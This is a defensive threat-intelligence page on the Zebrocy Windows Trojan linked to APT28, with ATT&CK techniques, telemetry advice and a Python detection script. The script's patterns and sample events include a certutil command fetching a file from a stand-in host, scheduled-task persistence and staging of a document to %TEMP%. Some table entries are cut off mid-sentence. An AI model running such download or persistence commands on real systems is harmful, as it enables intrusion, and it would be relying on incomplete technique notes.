S0251: Zebrocy
Analyst context for executives and security teams
Zebrocy matters because ATT&CK describes it as a Windows Trojan used by APT28 since at least November 2015, with multiple language variants. For leaders, the defensive value is not the malware name alone; it is the behavior cluster around discovery, persistence, command execution, collection, command-and-control, and exfiltration. If an organization cannot see registry queries, WMI or command-shell execution, scheduled tasks or logon-script persistence, local staging, and web or mail protocol C2 patterns on Windows endpoints, it may struggle to investigate this family of activity or produce credible incident and audit evidence.
Executive priority
Prioritize Zebrocy as a validation case for Windows endpoint visibility, SOC readiness, and incident response evidence quality. The ATT&CK relationships show behaviors that can support credential access, persistence, data collection, and exfiltration over C2 channels, so the business question is whether security teams can rapidly prove scope: which host executed suspicious commands, what persistence was created, what data may have been staged, and what external communications occurred. This is especially relevant for control investment decisions around EDR, centralized Windows logging, network monitoring, and response playbooks.
Technical view
ATT&CK provides no official detection text for Zebrocy, so defenders should build coverage around the related techniques rather than a single signature. Validate Windows telemetry for Query Registry, WMI, Windows Command Shell, Scheduled Task, Windows logon script persistence, process and system discovery, file and directory enumeration, screen capture, local data staging, file deletion, ingress tool transfer, and C2 over web or mail protocols. Because the malware is described as having C++, Delphi, AutoIt, C#, VB.NET, and Golang variants, detection engineering should avoid relying only on static file indicators and should emphasize behavioral correlations across execution, persistence, discovery, collection, and outbound communications.
Likely telemetry
- Windows endpoint process creation and command-line telemetry
- Windows Registry access and modification events, especially persistence-relevant keys
- WMI activity logs and process ancestry involving WMI execution
- Scheduled task creation, modification, and execution records
- Logon script configuration and execution evidence
Detection direction
- Correlate discovery-heavy activity with subsequent persistence, staging, and outbound C2 rather than alerting on common administrative commands in isolation.
- Tune for unusual WMI, cmd.exe, scheduled task, and registry activity by user, host role, parent process, and execution context to reduce false positives from normal administration.
- Confirm whether endpoint tooling records enough command-line, file, registry, and network context to reconstruct an incident timeline after file deletion or tool transfer.
- Review direct mail protocol use from endpoints; in many environments this is uncommon and may be higher signal, but exceptions must be baselined.
- Treat packed or variant binaries as a blind spot for static detection and validate memory/behavioral analytics where available.
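The correlation the detection directions above describe, as an added example that is not part of the ATT&CK object or the Glexia analysis: constructed Windows process-creation events are bucketed into discovery, persistence, staging and transfer/C2 patterns, and a host is flagged only when discovery is followed within a time window by one of the other buckets from a parent process outside an assumed administrative baseline. Event fields, command patterns, the window, the allowed parent and the sample log are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Behaviour buckets keyed to the related techniques; patterns are illustrative,
# not a complete rule set, and would be tuned per environment.
BUCKETS = {
    "discovery": re.compile(r"\b(systeminfo|tasklist|ipconfig|reg\s+query)\b", re.I),
    "persistence": re.compile(r"\b(schtasks\s+/create|reg\s+add\s+\S*(run|userinit))", re.I),
    "staging": re.compile(r"\b(copy|xcopy|rar|7z)\b.*%temp%", re.I),
    "c2": re.compile(r"\b(curl|certutil\s+-urlcache|powershell.*downloadstring)\b", re.I),
}
WINDOW = timedelta(minutes=30)
ALLOWED_PARENTS = {"ccmexec.exe"}  # assumed baseline: management-agent parent

def classify(cmd):
    """Return the set of bucket names whose pattern matches the command line."""
    return {name for name, rx in BUCKETS.items() if rx.search(cmd)}

def correlate(events, window=WINDOW):
    """Map host -> follow-on buckets seen within `window` after a discovery
    command, ignoring follow-ons launched by an allowed administrative parent."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
    hits = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        discovery_ts = [e["ts"] for e in evs if "discovery" in classify(e["cmd"])]
        for e in evs:
            kinds = classify(e["cmd"]) - {"discovery"}
            if not kinds or e["parent"].lower() in ALLOWED_PARENTS:
                continue
            if any(timedelta(0) <= e["ts"] - d <= window for d in discovery_ts):
                hits.setdefault(host, set()).update(kinds)
    return hits

def _ev(ts, host, user, parent, cmd):
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user, "parent": parent, "cmd": cmd}

SAMPLE_EVENTS = [  # constructed events, not real telemetry
    _ev("2024-01-10T09:00:00", "WS01", "alice", "winword.exe", "cmd.exe /c systeminfo & tasklist"),
    _ev("2024-01-10T09:04:00", "WS01", "alice", "cmd.exe", "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"),
    _ev("2024-01-10T09:12:00", "WS01", "alice", "cmd.exe", "schtasks /create /tn Updater /tr C:\\Users\\alice\\AppData\\Local\\Temp\\u.exe /sc minute"),
    _ev("2024-01-10T09:15:00", "WS01", "alice", "cmd.exe", "copy C:\\Users\\alice\\Documents\\q.docx %TEMP%\\o.bin"),
    _ev("2024-01-10T09:20:00", "WS01", "alice", "cmd.exe", "certutil -urlcache -split -f http://example.invalid/u.bin %TEMP%\\u.bin"),
    _ev("2024-01-10T10:00:00", "SRV02", "svc-sccm", "ccmexec.exe", "systeminfo"),
    _ev("2024-01-10T10:05:00", "SRV02", "svc-sccm", "ccmexec.exe", "schtasks /create /tn Patch /tr C:\\patch\\run.cmd /sc daily"),
    _ev("2024-01-10T11:00:00", "WS03", "bob", "explorer.exe", "ipconfig /all"),
]

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))  # WS01 flagged; SRV02 and WS03 are not
```

The management-host run of the same commands is suppressed by the parent baseline and the discovery-only workstation never reaches the follow-on stage, which is the point of correlating rather than alerting on each command in isolation.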
Mitigation priorities
- Start with visibility: ensure Windows endpoints, network egress points, and identity-relevant systems produce centralized, retained telemetry for the behaviors listed in the ATT&CK relationships.
- Harden and monitor persistence paths including scheduled tasks and Windows logon scripts, with change control for legitimate administrative use.
- Restrict and monitor high-risk execution paths such as WMI and command shell usage where business operations allow.
- Apply least privilege and administrative separation so discovery and persistence attempts from standard user contexts are easier to detect and contain.
- Control outbound communications by enforcing proxying, DNS logging, and egress rules for web and mail protocols instead of allowing unrestricted endpoint connections.
Analyst notes and limits
This take is based on the supplied ATT&CK malware object, external references, and relationship context. The most decision-useful context is that Zebrocy is a Windows Trojan associated in ATT&CK with APT28 use and a broad set of related techniques spanning discovery, execution, persistence, collection, C2, exfiltration, and stealth. The object does not provide official detection guidance, so recommendations are framed as validation directions derived from related ATT&CK techniques, not as confirmed detections for every Zebrocy variant.
The supplied object lists Windows as the malware platform and does not specify tactics directly. Several related techniques have broader platform listings, but this take does not expand Zebrocy beyond Windows. No active exploitation status, customer exposure, specific indicators of compromise, campaign targeting, or guaranteed detection coverage is provided in the supplied fields. Local baselines, logging configuration, and environment-specific use of administrative tools are required to judge alert fidelity.
Zebrocy
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1124 | System Time Discovery | |
| Enterprise | T1057 | Process Discovery | |
| Enterprise | T1047 | Windows Management Instrumentation | |
| Enterprise | T1049 | System Network Connections Discovery | Zebrocy uses |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1113 | Screen Capture | |
| Enterprise | T1120 | Peripheral Device Discovery | |
| Enterprise | T1033 | System Owner/User Discovery | |
| Enterprise | T1056.004 | Credential API Hooking Sub-technique | Zebrocy installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file-stealing method. (Citation: Securelist Sofacy Feb 2018) |
| Enterprise | T1041 | Exfiltration Over C2 Channel | |
| Enterprise | T1082 | System Information Discovery | |
| Enterprise | T1071.003 | Mail Protocols Sub-technique | |
| Enterprise | T1071.001 | Web Protocols Sub-technique | |
| Enterprise | T1016 | System Network Configuration Discovery | Zebrocy runs the |
| Enterprise | T1083 | File and Directory Discovery | Zebrocy searches for files that are 60 MB or less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. Zebrocy also runs the |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | |
| Enterprise | T1027.002 | Software Packing Sub-technique | |
| Enterprise | T1680 | Local Storage Discovery | |
| Enterprise | T1560 | Archive Collected Data | |
| Enterprise | T1037.001 | Logon Script (Windows) Sub-technique | Zebrocy performs persistence with a logon script via adding to the Registry key |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | |
| Enterprise | T1573.002 | Asymmetric Cryptography Sub-technique | |
| Enterprise | T1074.001 | Local Data Staging Sub-technique | Zebrocy stores all collected information in a single file before exfiltration. (Citation: ESET Zebrocy Nov 2018) |
| Enterprise | T1012 | Query Registry | Zebrocy executes the |
| Enterprise | T1070.004 | File Deletion Sub-technique | |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | |
| Enterprise | T1135 | Network Share Discovery | Zebrocy identifies network drives when they are added to victim systems. (Citation: Securelist Sofacy Feb 2018) |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | |
| Enterprise | T1119 | Automated Collection | Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, .xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz. (Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019) |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | Zebrocy has the capability to upload dumper tools that extract credentials from web browsers and store them in database files. (Citation: ESET Zebrocy May 2019) |
Groups, software, and campaigns
G0007: APT28
APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.[1][2] This group has been active since at least 2004.[3][4][5][6][7][8][9][10][11][12][13]
APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.[5] In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.[14] Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 3.1 | | Current bundle | 82f36f10b4ed… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Palo Alto Sofacy 06-2018: Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
- [2] Unit42 Cannon Nov 2018: Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.
- [3] Unit42 Sofacy Dec 2018: Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019.
- [4] CISA Zebrocy Oct 2020: CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020.
- [5] Accenture SNAKEMACKEREL Nov 2018: Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
- [6] CyberScoop APT28 Nov 2018: Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. Retrieved July 16, 2019.
- [7] Zebrocy (associated name): (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)
- [8] Zekapab (associated name): (Citation: CyberScoop APT28 Nov 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)
- [9] mitre-attack S0251
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.